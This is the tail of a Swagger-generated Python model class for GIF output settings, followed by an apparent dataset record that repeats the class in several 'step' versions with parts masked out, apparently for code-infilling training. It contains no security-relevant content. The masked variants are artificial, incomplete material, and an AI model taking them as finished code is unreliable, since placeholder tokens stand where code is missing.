:param overlay_alignment: The overlay_alignment of this GIFOutput.
:type: list[str]
"""
allowed_values = ["left", "center", "right", "top", "middle", "bottom"]
if not set(overlay_alignment).issubset(set(allowed_values)):
raise ValueError(
"Invalid values for `overlay_alignment` [{0}], must be a subset of [{1}]"
.format(", ".join(map(str, set(overlay_alignment) - set(allowed_values))),
", ".join(map(str, allowed_values)))
)
self._overlay_alignment = overlay_alignment
@property
def overlay_scale(self):
"""Gets the overlay_scale of this GIFOutput.
Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's
completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the
image according to the alignment settings. * Fill: scale the image up or down so it completely fills the
video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't
resize the overlay image.
:return: The overlay_scale of this GIFOutput.
:rtype: str
"""
return self._overlay_scale
@overlay_scale.setter
def overlay_scale(self, overlay_scale):
"""Sets the overlay_scale of this GIFOutput.
Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's
completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the
image according to the alignment settings. * Fill: scale the image up or down so it completely fills the
video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't
resize the overlay image.
:param overlay_scale: The overlay_scale of this GIFOutput.
:type: str
"""
allowed_values = ["fit", "fill", "none"]
if overlay_scale not in allowed_values:
raise ValueError(
"Invalid value for `overlay_scale` ({0}), must be one of {1}"
.format(overlay_scale, allowed_values)
)
self._overlay_scale = overlay_scale
@property
def label(self):
"""Gets the label of this GIFOutput.
This label is another way to identify this specific output. The label is returned in the response,
but does not appear in the file name.
:return: The label of this GIFOutput.
:rtype: str
"""
return self._label
@label.setter
def label(self, label):
"""Sets the label of this GIFOutput.
This label is another way to identify this specific output. The label is returned in the response,
but does not appear in the file name.
:param label: The label of this GIFOutput.
:type: str
"""
self._label = label
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, GIFOutput):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
normal
|
{
"blob_id": "2362c9a12f97f32f6136aaf16a55cf4acbaf9294",
"index": 4753,
"step-1": "<mask token>\n\n\nclass GIFOutput(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, gif_fps=None, color_depth=None, gif_loop=None,\n height=None, start=None, duration=None, suffix=None, overlay=None,\n overlay_alignment=None, overlay_scale='fit', label=None):\n \"\"\"GIFOutput - a model defined in Swagger\"\"\"\n self._gif_fps = None\n self._color_depth = None\n self._gif_loop = None\n self._height = None\n self._start = None\n self._duration = None\n self._suffix = None\n self._overlay = None\n self._overlay_alignment = None\n self._overlay_scale = None\n self._label = None\n self.discriminator = None\n if gif_fps is not None:\n self.gif_fps = gif_fps\n if color_depth is not None:\n self.color_depth = color_depth\n if gif_loop is not None:\n self.gif_loop = gif_loop\n self.height = height\n self.start = start\n if duration is not None:\n self.duration = duration\n if suffix is not None:\n self.suffix = suffix\n if overlay is not None:\n self.overlay = overlay\n if overlay_alignment is not None:\n self.overlay_alignment = overlay_alignment\n if overlay_scale is not None:\n self.overlay_scale = overlay_scale\n if label is not None:\n self.label = label\n\n @property\n def gif_fps(self):\n \"\"\"Gets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :return: The gif_fps of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._gif_fps\n\n @gif_fps.setter\n def gif_fps(self, gif_fps):\n \"\"\"Sets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :param gif_fps: The gif_fps of this GIFOutput.\n :type: float\n \"\"\"\n if gif_fps is not None and gif_fps > 30:\n raise ValueError(\n 'Invalid value for `gif_fps`, must be a value less than or equal to `30`'\n )\n self._gif_fps = gif_fps\n\n @property\n def color_depth(self):\n \"\"\"Gets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :return: The color_depth of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._color_depth\n\n @color_depth.setter\n def color_depth(self, color_depth):\n \"\"\"Sets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :param color_depth: The color_depth of this GIFOutput.\n :type: float\n \"\"\"\n self._color_depth = color_depth\n\n @property\n def gif_loop(self):\n \"\"\"Gets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :return: The gif_loop of this GIFOutput.\n :rtype: int\n \"\"\"\n return self._gif_loop\n\n @gif_loop.setter\n def gif_loop(self, gif_loop):\n \"\"\"Sets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :param gif_loop: The gif_loop of this GIFOutput.\n :type: int\n \"\"\"\n if gif_loop is not None and gif_loop < -1:\n raise ValueError(\n 'Invalid value for `gif_loop`, must be a value greater than or equal to `-1`'\n )\n self._gif_loop = gif_loop\n <mask token>\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :param height: The height of this GIFOutput.\n :type: float\n \"\"\"\n if height is None:\n raise ValueError('Invalid value for `height`, must not be `None`')\n self._height = height\n\n @property\n def start(self):\n \"\"\"Gets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :return: The start of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._start\n\n @start.setter\n def start(self, start):\n \"\"\"Sets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :param start: The start of this GIFOutput.\n :type: float\n \"\"\"\n if start is None:\n raise ValueError('Invalid value for `start`, must not be `None`')\n self._start = start\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :return: The duration of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :param duration: The duration of this GIFOutput.\n :type: float\n \"\"\"\n self._duration = duration\n\n @property\n def suffix(self):\n \"\"\"Gets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :return: The suffix of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._suffix\n\n @suffix.setter\n def suffix(self, suffix):\n \"\"\"Sets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :param suffix: The suffix of this GIFOutput.\n :type: str\n \"\"\"\n self._suffix = suffix\n\n @property\n def overlay(self):\n \"\"\"Gets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :return: The overlay of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay\n\n @overlay.setter\n def overlay(self, overlay):\n \"\"\"Sets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :param overlay: The overlay of this GIFOutput.\n :type: str\n \"\"\"\n self._overlay = overlay\n\n @property\n def overlay_alignment(self):\n \"\"\"Gets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :return: The overlay_alignment of this GIFOutput.\n :rtype: list[str]\n \"\"\"\n return self._overlay_alignment\n\n @overlay_alignment.setter\n def overlay_alignment(self, overlay_alignment):\n \"\"\"Sets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :param overlay_alignment: The overlay_alignment of this GIFOutput.\n :type: list[str]\n \"\"\"\n allowed_values = ['left', 'center', 'right', 'top', 'middle', 'bottom']\n if not set(overlay_alignment).issubset(set(allowed_values)):\n raise ValueError(\n 'Invalid values for `overlay_alignment` [{0}], must be a subset of [{1}]'\n .format(', '.join(map(str, set(overlay_alignment) - set(\n allowed_values))), ', '.join(map(str, allowed_values))))\n self._overlay_alignment = overlay_alignment\n\n @property\n def overlay_scale(self):\n \"\"\"Gets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :return: The overlay_scale of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay_scale\n\n @overlay_scale.setter\n def overlay_scale(self, overlay_scale):\n \"\"\"Sets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :param overlay_scale: The overlay_scale of this GIFOutput.\n :type: str\n \"\"\"\n allowed_values = ['fit', 'fill', 'none']\n if overlay_scale not in allowed_values:\n raise ValueError(\n 'Invalid value for `overlay_scale` ({0}), must be one of {1}'\n .format(overlay_scale, allowed_values))\n self._overlay_scale = overlay_scale\n\n @property\n def label(self):\n \"\"\"Gets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :return: The label of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"Sets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :param label: The label of this GIFOutput.\n :type: str\n \"\"\"\n self._label = label\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n return result\n <mask token>\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, GIFOutput):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-2": "<mask token>\n\n\nclass GIFOutput(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, gif_fps=None, color_depth=None, gif_loop=None,\n height=None, start=None, duration=None, suffix=None, overlay=None,\n overlay_alignment=None, overlay_scale='fit', label=None):\n \"\"\"GIFOutput - a model defined in Swagger\"\"\"\n self._gif_fps = None\n self._color_depth = None\n self._gif_loop = None\n self._height = None\n self._start = None\n self._duration = None\n self._suffix = None\n self._overlay = None\n self._overlay_alignment = None\n self._overlay_scale = None\n self._label = None\n self.discriminator = None\n if gif_fps is not None:\n self.gif_fps = gif_fps\n if color_depth is not None:\n self.color_depth = color_depth\n if gif_loop is not None:\n self.gif_loop = gif_loop\n self.height = height\n self.start = start\n if duration is not None:\n self.duration = duration\n if suffix is not None:\n self.suffix = suffix\n if overlay is not None:\n self.overlay = overlay\n if overlay_alignment is not None:\n self.overlay_alignment = overlay_alignment\n if overlay_scale is not None:\n self.overlay_scale = overlay_scale\n if label is not None:\n self.label = label\n\n @property\n def gif_fps(self):\n \"\"\"Gets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :return: The gif_fps of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._gif_fps\n\n @gif_fps.setter\n def gif_fps(self, gif_fps):\n \"\"\"Sets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :param gif_fps: The gif_fps of this GIFOutput.\n :type: float\n \"\"\"\n if gif_fps is not None and gif_fps > 30:\n raise ValueError(\n 'Invalid value for `gif_fps`, must be a value less than or equal to `30`'\n )\n self._gif_fps = gif_fps\n\n @property\n def color_depth(self):\n \"\"\"Gets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :return: The color_depth of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._color_depth\n\n @color_depth.setter\n def color_depth(self, color_depth):\n \"\"\"Sets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :param color_depth: The color_depth of this GIFOutput.\n :type: float\n \"\"\"\n self._color_depth = color_depth\n\n @property\n def gif_loop(self):\n \"\"\"Gets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :return: The gif_loop of this GIFOutput.\n :rtype: int\n \"\"\"\n return self._gif_loop\n\n @gif_loop.setter\n def gif_loop(self, gif_loop):\n \"\"\"Sets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :param gif_loop: The gif_loop of this GIFOutput.\n :type: int\n \"\"\"\n if gif_loop is not None and gif_loop < -1:\n raise ValueError(\n 'Invalid value for `gif_loop`, must be a value greater than or equal to `-1`'\n )\n self._gif_loop = gif_loop\n\n @property\n def height(self):\n \"\"\"Gets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :return: The height of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._height\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :param height: The height of this GIFOutput.\n :type: float\n \"\"\"\n if height is None:\n raise ValueError('Invalid value for `height`, must not be `None`')\n self._height = height\n\n @property\n def start(self):\n \"\"\"Gets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :return: The start of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._start\n\n @start.setter\n def start(self, start):\n \"\"\"Sets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :param start: The start of this GIFOutput.\n :type: float\n \"\"\"\n if start is None:\n raise ValueError('Invalid value for `start`, must not be `None`')\n self._start = start\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :return: The duration of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :param duration: The duration of this GIFOutput.\n :type: float\n \"\"\"\n self._duration = duration\n\n @property\n def suffix(self):\n \"\"\"Gets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :return: The suffix of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._suffix\n\n @suffix.setter\n def suffix(self, suffix):\n \"\"\"Sets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :param suffix: The suffix of this GIFOutput.\n :type: str\n \"\"\"\n self._suffix = suffix\n\n @property\n def overlay(self):\n \"\"\"Gets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :return: The overlay of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay\n\n @overlay.setter\n def overlay(self, overlay):\n \"\"\"Sets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :param overlay: The overlay of this GIFOutput.\n :type: str\n \"\"\"\n self._overlay = overlay\n\n @property\n def overlay_alignment(self):\n \"\"\"Gets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :return: The overlay_alignment of this GIFOutput.\n :rtype: list[str]\n \"\"\"\n return self._overlay_alignment\n\n @overlay_alignment.setter\n def overlay_alignment(self, overlay_alignment):\n \"\"\"Sets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :param overlay_alignment: The overlay_alignment of this GIFOutput.\n :type: list[str]\n \"\"\"\n allowed_values = ['left', 'center', 'right', 'top', 'middle', 'bottom']\n if not set(overlay_alignment).issubset(set(allowed_values)):\n raise ValueError(\n 'Invalid values for `overlay_alignment` [{0}], must be a subset of [{1}]'\n .format(', '.join(map(str, set(overlay_alignment) - set(\n allowed_values))), ', '.join(map(str, allowed_values))))\n self._overlay_alignment = overlay_alignment\n\n @property\n def overlay_scale(self):\n \"\"\"Gets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :return: The overlay_scale of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay_scale\n\n @overlay_scale.setter\n def overlay_scale(self, overlay_scale):\n \"\"\"Sets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :param overlay_scale: The overlay_scale of this GIFOutput.\n :type: str\n \"\"\"\n allowed_values = ['fit', 'fill', 'none']\n if overlay_scale not in allowed_values:\n raise ValueError(\n 'Invalid value for `overlay_scale` ({0}), must be one of {1}'\n .format(overlay_scale, allowed_values))\n self._overlay_scale = overlay_scale\n\n @property\n def label(self):\n \"\"\"Gets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :return: The label of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"Sets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :param label: The label of this GIFOutput.\n :type: str\n \"\"\"\n self._label = label\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n return result\n <mask token>\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, GIFOutput):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-3": "<mask token>\n\n\nclass GIFOutput(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, gif_fps=None, color_depth=None, gif_loop=None,\n height=None, start=None, duration=None, suffix=None, overlay=None,\n overlay_alignment=None, overlay_scale='fit', label=None):\n \"\"\"GIFOutput - a model defined in Swagger\"\"\"\n self._gif_fps = None\n self._color_depth = None\n self._gif_loop = None\n self._height = None\n self._start = None\n self._duration = None\n self._suffix = None\n self._overlay = None\n self._overlay_alignment = None\n self._overlay_scale = None\n self._label = None\n self.discriminator = None\n if gif_fps is not None:\n self.gif_fps = gif_fps\n if color_depth is not None:\n self.color_depth = color_depth\n if gif_loop is not None:\n self.gif_loop = gif_loop\n self.height = height\n self.start = start\n if duration is not None:\n self.duration = duration\n if suffix is not None:\n self.suffix = suffix\n if overlay is not None:\n self.overlay = overlay\n if overlay_alignment is not None:\n self.overlay_alignment = overlay_alignment\n if overlay_scale is not None:\n self.overlay_scale = overlay_scale\n if label is not None:\n self.label = label\n\n @property\n def gif_fps(self):\n \"\"\"Gets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :return: The gif_fps of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._gif_fps\n\n @gif_fps.setter\n def gif_fps(self, gif_fps):\n \"\"\"Sets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :param gif_fps: The gif_fps of this GIFOutput.\n :type: float\n \"\"\"\n if gif_fps is not None and gif_fps > 30:\n raise ValueError(\n 'Invalid value for `gif_fps`, must be a value less than or equal to `30`'\n )\n self._gif_fps = gif_fps\n\n @property\n def color_depth(self):\n \"\"\"Gets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :return: The color_depth of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._color_depth\n\n @color_depth.setter\n def color_depth(self, color_depth):\n \"\"\"Sets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :param color_depth: The color_depth of this GIFOutput.\n :type: float\n \"\"\"\n self._color_depth = color_depth\n\n @property\n def gif_loop(self):\n \"\"\"Gets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :return: The gif_loop of this GIFOutput.\n :rtype: int\n \"\"\"\n return self._gif_loop\n\n @gif_loop.setter\n def gif_loop(self, gif_loop):\n \"\"\"Sets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :param gif_loop: The gif_loop of this GIFOutput.\n :type: int\n \"\"\"\n if gif_loop is not None and gif_loop < -1:\n raise ValueError(\n 'Invalid value for `gif_loop`, must be a value greater than or equal to `-1`'\n )\n self._gif_loop = gif_loop\n\n @property\n def height(self):\n \"\"\"Gets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :return: The height of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._height\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. The width is automatically\n calculated to keep the aspect ratio.\n\n :param height: The height of this GIFOutput.\n :type: float\n \"\"\"\n if height is None:\n raise ValueError('Invalid value for `height`, must not be `None`')\n self._height = height\n\n @property\n def start(self):\n \"\"\"Gets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :return: The start of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._start\n\n @start.setter\n def start(self, start):\n \"\"\"Sets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :param start: The start of this GIFOutput.\n :type: float\n \"\"\"\n if start is None:\n raise ValueError('Invalid value for `start`, must not be `None`')\n self._start = start\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :return: The duration of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :param duration: The duration of this GIFOutput.\n :type: float\n \"\"\"\n self._duration = duration\n\n @property\n def suffix(self):\n \"\"\"Gets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :return: The suffix of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._suffix\n\n @suffix.setter\n def suffix(self, suffix):\n \"\"\"Sets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :param suffix: The suffix of this GIFOutput.\n :type: str\n \"\"\"\n self._suffix = suffix\n\n @property\n def overlay(self):\n \"\"\"Gets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :return: The overlay of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay\n\n @overlay.setter\n def overlay(self, overlay):\n \"\"\"Sets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :param overlay: The overlay of this GIFOutput.\n :type: str\n \"\"\"\n self._overlay = overlay\n\n @property\n def overlay_alignment(self):\n \"\"\"Gets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :return: The overlay_alignment of this GIFOutput.\n :rtype: list[str]\n \"\"\"\n return self._overlay_alignment\n\n @overlay_alignment.setter\n def overlay_alignment(self, overlay_alignment):\n \"\"\"Sets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :param overlay_alignment: The overlay_alignment of this GIFOutput.\n :type: list[str]\n \"\"\"\n allowed_values = ['left', 'center', 'right', 'top', 'middle', 'bottom']\n if not set(overlay_alignment).issubset(set(allowed_values)):\n raise ValueError(\n 'Invalid values for `overlay_alignment` [{0}], must be a subset of [{1}]'\n .format(', '.join(map(str, set(overlay_alignment) - set(\n allowed_values))), ', '.join(map(str, allowed_values))))\n self._overlay_alignment = overlay_alignment\n\n @property\n def overlay_scale(self):\n \"\"\"Gets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :return: The overlay_scale of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay_scale\n\n @overlay_scale.setter\n def overlay_scale(self, overlay_scale):\n \"\"\"Sets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :param overlay_scale: The overlay_scale of this GIFOutput.\n :type: str\n \"\"\"\n allowed_values = ['fit', 'fill', 'none']\n if overlay_scale not in allowed_values:\n raise ValueError(\n 'Invalid value for `overlay_scale` ({0}), must be one of {1}'\n .format(overlay_scale, allowed_values))\n self._overlay_scale = overlay_scale\n\n @property\n def label(self):\n \"\"\"Gets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :return: The label of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"Sets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :param label: The label of this GIFOutput.\n :type: str\n \"\"\"\n self._label = label\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, GIFOutput):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
